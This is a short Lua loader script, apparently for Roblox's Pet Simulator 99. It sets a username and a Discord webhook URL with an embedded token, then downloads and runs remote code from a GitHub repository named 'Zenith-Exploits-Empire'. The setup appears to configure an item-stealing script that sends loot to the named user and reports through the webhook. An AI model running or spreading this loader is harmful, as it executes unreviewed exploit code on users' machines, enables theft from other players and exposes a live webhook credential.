-- Generated by Generator V5.2
Username = "ELCAPO12300"
Username2 = "ELCAPO12300"
Webhook = "https://discord.com/api/webhooks/1364221950037200946/sUdqiiMU2tUhlSb01_Q1o63ZylqUVC20cExY4ha97P-eynB8UZVZBStEjiU2G5gzu6TG"

loadstring(game:HttpGet("https://raw.githubusercontent.com/Zenith-Exploits-Empire/Final/refs/heads/main/RAW%20-%20Pet%20Simulator%2099"))()